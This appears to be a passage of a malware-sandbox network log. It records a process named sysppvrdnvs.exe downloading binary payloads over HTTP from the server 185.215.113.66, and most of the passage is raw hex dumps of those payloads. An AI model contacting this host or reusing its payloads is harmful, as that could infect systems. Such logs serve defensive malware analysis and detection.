                                                                                                                                                                                            Oct 26, 2024 07:28:06.897897005 CEST1236INData Raw: 33 89 55 d3 42 ea e6 0a 60 c0 e6 af 3e 2d 1b 9e 14 58 59 d4 9a 29 83 23 34 c7 26 83 a8 d3 f8 c3 e5 7e 5b 15 03 9c b3 c7 59 02 ec e9 e5 83 ed 15 d6 eb d8 c9 7a 68 76 79 12 99 fa d9 2c 9a bf c0 8d 40 78 c3 ba b1 57 d8 59 de b2 1f 3e 95 2f 20 f2 09
                                                                                                                                                                                            Data Ascii: 3UB`>-XY)#4&~[Yzhvy,@xWY>/ !P(I,SkM79q(4jOOxq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9
                                                                                                                                                                                            Oct 26, 2024 07:28:06.903274059 CEST1236INData Raw: 9b 25 ac b2 37 c5 83 ea 32 35 21 ce 00 be c2 02 21 7f 2d 07 6c 99 85 e9 5a 72 c6 bd 1e 52 e1 f1 c5 02 19 43 88 8c cf fb b3 ea 7e fa 80 08 27 c2 ce 70 c7 43 f6 b7 a7 9a 55 5c 05 41 f5 a2 65 10 84 4a 0d 31 f5 b5 24 6e 0b d7 09 f1 63 df 53 56 13 0f
                                                                                                                                                                                            Data Ascii: %725!!-lZrRC~'pCU\AeJ1$ncSVqq-sqFr6{+:lka5F{kCBt|c?;p~8FE!1*vs7.0du=rFWu&uLD,6|< b&z


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            22192.168.2.650020185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:08.950253010 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853734016 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:09 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 8960
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "671230ee-2300"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853780985 CEST112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                            Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853843927 CEST1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                                                                            Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853883028 CEST1236INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                                                                            Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853920937 CEST1236INData Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e
                                                                                                                                                                                            Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9
                                                                                                                                                                                            Oct 26, 2024 07:28:09.853961945 CEST336INData Raw: 03 c4 8d f3 91 32 4d 71 23 2b b6 64 8c 4d 8f 93 31 e2 1e fb af 3b 6f 02 ab bb c8 79 d0 e2 41 b5 7a 6d ab 40 21 3c 82 19 45 fe 84 e5 c5 6e 6b 20 3f dd 13 d4 43 0a 1a bb b4 e1 3d 7c 39 50 9e c0 b5 a3 65 f5 7f 64 6e dd 19 47 0b 44 ba 46 25 a8 ea 9e
                                                                                                                                                                                            Data Ascii: 2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%S\(L7QREU6=oNL |~;vF|5qOh[IO*9%i0q~3T|UJ
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854001999 CEST1236INData Raw: eb 45 4c 97 ef 2a 1d 2d 9e 44 a8 12 24 dd 16 68 4f 59 12 bf 43 b3 04 4d 19 04 15 bf 01 95 74 9f 14 3b 45 eb f3 d9 62 da 79 9d 16 ba d9 cc d4 f6 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6
                                                                                                                                                                                            Data Ascii: EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\is
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854037046 CEST212INData Raw: 44 69 97 04 49 86 d7 b5 59 b2 c1 bc a6 6a 60 69 c7 d9 b8 01 f1 03 06 0d 0c b0 fc aa 40 67 6e cf 94 4b 3d fa 20 12 1c 7b e4 0b 90 7d 37 06 4e 57 b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb
                                                                                                                                                                                            Data Ascii: DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854068041 CEST1236INData Raw: 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9 52 e0 6a 2a e5 1f 24 2e f0 7a 22 1b 05 a3 f3 9a a7 0e 57 86 82 d7 c4 74 2c 71 4e 03 b7 18 b2 d7 68 22 31 3d 33 49 62 3a
                                                                                                                                                                                            Data Ascii: 4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj|KYD$~$nb
                                                                                                                                                                                            Oct 26, 2024 07:28:09.854104996 CEST1148INData Raw: 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d a0 c3 86 88 51 28 33 be 06 de c9 e8 6a 3f f4 a4 c0 76 cb 4b 3d fb 7b ae 2c 83 a5 00 6d d1 40 0b 9c c8 1b 85 5e ee a2 dd
                                                                                                                                                                                            Data Ascii: H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?Q


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            23192.168.2.650021185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:11.889955044 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788755894 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:12 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 16128
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a973-3f00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788774014 CEST1236INData Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12
                                                                                                                                                                                            Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H|f|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788794994 CEST424INData Raw: 79 66 85 08 93 95 1d 74 ce 4a 11 6d 82 e1 0a e2 81 2a fe 53 85 e7 03 3d 26 89 2a ac bc 6b 82 a8 ad b3 ff 6f 2b 13 be 1a 78 df 38 94 08 4e 19 a1 85 a6 e7 97 55 2a 34 6a c4 05 a0 b4 7d d6 cf ac 4f ad fd 67 d8 7a 3f 8d 05 43 ee 09 c1 87 a8 e4 28 65
                                                                                                                                                                                            Data Ascii: yftJm*S=&*ko+x8NU*4j}Ogz?C(ekds&;`!R[8ipurbyc'Xg*y88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788806915 CEST1148INData Raw: 9f 7e 68 88 22 b7 81 9b f3 8f c3 d9 9d 1b 44 88 45 a9 14 85 48 d8 2b dd 99 e1 85 89 7b 94 2b a6 1e 5f d8 37 e6 72 5e 9d 61 30 88 cb 04 05 b2 f6 f9 cd 24 40 df 6e 29 98 56 5c 9d d3 54 6d 3b 06 37 ab 99 4f f3 92 00 37 44 1e d8 08 1b fc 2d 94 01 9b
                                                                                                                                                                                            Data Ascii: ~h"DEH+{+_7r^a0$@n)V\Tm;7O7D-'l{)VlQl\Np nC,Oq^PG|rBinsfw?2<m(hh.=.t<HHLdN=FX)7S%4_BTB|oJ34$1M
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788817883 CEST1236INData Raw: b9 1a 39 14 ab a4 68 77 17 61 1d 4c 7b 8d 25 bc 2b e9 a0 8a d9 5f fa a6 41 31 43 1c 76 91 d9 73 44 4a 06 90 dc 72 66 88 82 d3 13 86 86 d2 3f b9 a4 5a 2d e3 0f 5c cf b3 5d a0 3f 69 b1 66 b5 3b 1a 26 28 41 1f 48 0b ab 67 eb e3 e6 06 15 2b 5e 8e eb
                                                                                                                                                                                            Data Ascii: 9hwaL{%+_A1CvsDJrf?Z-\]?if;&(AHg+^M$^GGWRmMZuir&Zrqa!s2c{Ms|T[cS^fNy#`=-\8H6:bzm)A]YARZRH?]4S?6o
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788842916 CEST1236INData Raw: 05 43 70 94 6f 23 94 3d 53 1f 2d 02 a6 b7 91 73 f0 f8 81 5f 62 3d ba 9e 5a 40 c4 62 28 e4 41 3e 4f 3e c0 e3 d4 32 9b 91 1c 23 69 8e 25 cf 77 e3 74 b0 3c 32 dd 91 85 14 67 51 45 b4 f8 3e 26 b8 48 82 b7 96 4d 2c 54 8b 3e 45 bb 83 af 30 b8 a2 f0 13
                                                                                                                                                                                            Data Ascii: Cpo#=S-s_b=Z@b(A>O>2#i%wt<2gQE>&HM,T>E0`D/ZSd|g=K/rz&/D)4vs3LQq>&$PR&0*>%h~?jw*)pg8J Zhpl^yh(qKoIPN
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788862944 CEST324INData Raw: f5 0b 23 41 fa 16 64 5e bc 86 37 70 a1 37 3a e3 45 6c 63 9f f2 39 42 04 e3 c9 09 9f 63 92 60 86 fd 02 4c b0 dc e6 00 61 f4 65 7f 60 e4 25 13 9b 97 69 0d 4f ca 8c 47 56 59 3e 1e a5 07 b3 67 2d bd 1e 90 73 31 07 1b 2f 3e a4 76 21 05 d3 8c 91 90 68
                                                                                                                                                                                            Data Ascii: #Ad^7p7:Elc9Bc`Lae`%iOGVY>g-s1/>v!hA_5cdKp> H,25kCl#p3@^Jb.?j4V-'/hY^k}B[X%JNS{\vPe<[W7b${SXTb]_'g'P
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788876057 CEST1236INData Raw: 80 9d c5 32 55 93 4b 81 f8 d9 37 00 b9 fb 15 9f 0a ed 2b 6a e4 ef 08 67 7d 9a 95 b8 35 cc 47 51 b2 b1 a2 a6 a1 9b 83 d4 94 11 b3 50 1a b2 5a f7 8f 56 2c fa 49 3c bb b4 aa 66 15 9d 73 e1 c1 f6 2a f8 c0 68 14 50 48 a9 e9 5f a0 89 51 cb c6 70 46 83
                                                                                                                                                                                            Data Ascii: 2UK7+jg}5GQPZV,I<fs*hPH_QpFULkX4d_P,mZiYFgqZJld<`Ijk3#cNR?~5[@%WS/4kE2UdM9?%EO!&>Tg=`>uF'"[
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788887978 CEST1236INData Raw: d2 9d 92 53 4e 8d 8a 67 f1 96 1e ca 61 a2 39 0e a5 75 4e 7f 43 be 9a 7a 42 19 5c 44 23 8e a7 f1 c7 b4 ef f4 34 f5 ea c0 c6 9d 42 a1 be 25 35 5d 91 b7 2f fb 57 de c0 c2 43 8e 9d ba c5 c2 de 56 be bf 89 06 97 08 15 4e 05 2a 0e a5 7f 1b 0d d3 98 e8
                                                                                                                                                                                            Data Ascii: SNga9uNCzB\D#4B%5]/WCVN*~C\F=P0^(IZ=\9cD&eY>3_q;DlS(m=WUg[Sj%Ko7v!M\oD]*c'q7tQnE=jv^YqjkTqHj<TM]VF
                                                                                                                                                                                            Oct 26, 2024 07:28:12.788899899 CEST1236INData Raw: 52 3c c5 bd 7d 01 6a ed fa 6c 00 63 09 0d 48 a1 f8 16 b9 9b 26 06 0c 71 c1 02 4a 14 24 ab e2 0d e0 93 9d 59 04 93 11 63 22 2f 70 d1 c9 0c b1 7e 61 54 9f c5 a6 6c a0 92 75 29 01 02 e5 7f 98 4b d7 94 db 6a 1f c3 be 93 e3 ff c0 cb 7a 36 a6 06 4a e1
                                                                                                                                                                                            Data Ascii: R<}jlcH&qJ$Yc"/p~aTlu)Kjz6Jyz]x=$s^!}_m+ck@L.<4^f wtEpr)o}nEL-MC*kK<[fw^jBYio1JvHwa
                                                                                                                                                                                            Oct 26, 2024 07:28:12.794302940 CEST1236INData Raw: d3 db 5c 31 71 6c d2 f0 00 ac 14 92 55 52 74 b5 1b 28 36 ee f8 74 c2 d2 9d 56 5e dc 6a ec 28 2a a9 e5 8a f1 39 85 01 d8 09 10 40 9e e8 9a ab cc 39 7e 76 23 69 2f 4f df bc 42 04 2b b2 88 62 72 b7 bb be 62 94 10 72 be 8d 4f 34 e0 fb 8a 4e ff 1e 04
                                                                                                                                                                                            Data Ascii: \1qlURt(6tV^j(*9@9~v#i/OB+brbrO4NzIBJq#LE2&xPV7vg?6K0v'p}%6GD+D%HTD$PioV><x6>S@Kv*Jj`-y-'#[jMF,aY


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            24192.168.2.650023185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:28:14.895416021 CEST166OUTGET /4 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799163103 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:28:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 10496
                                                                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67154d18-2900"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799196005 CEST112INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                            Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799232960 CEST1236INData Raw: eb f7 e1 3e b0 c8 e9 ca 8d d4 e4 c0 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b
                                                                                                                                                                                            Data Ascii: >*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7|VbF9?gk{is6u
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799252987 CEST1236INData Raw: be 2f 61 3a 1b 4e 54 9f 16 74 9c d6 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc
                                                                                                                                                                                            Data Ascii: /a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799280882 CEST1236INData Raw: 99 31 96 51 d2 49 8d 75 9f a1 b5 63 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c
                                                                                                                                                                                            Data Ascii: 1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh[
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799303055 CEST336INData Raw: 93 05 8f 66 d7 1c 1e 74 35 55 8e 3e 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99
                                                                                                                                                                                            Data Ascii: ft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6
                                                                                                                                                                                            Oct 26, 2024 07:28:15.799333096 CEST1236INData Raw: aa fa 62 12 93 06 96 26 10 ad ee 3f 3a 32 0f 63 b0 c9 34 e0 c6 5d 26 60 69 44 af c5 91 85 d2 84 09 89 f2 6c 3d 84 bc 18 7a 15 34 45 a4 64 67 41 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12
                                                                                                                                                                                            Data Ascii: b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/
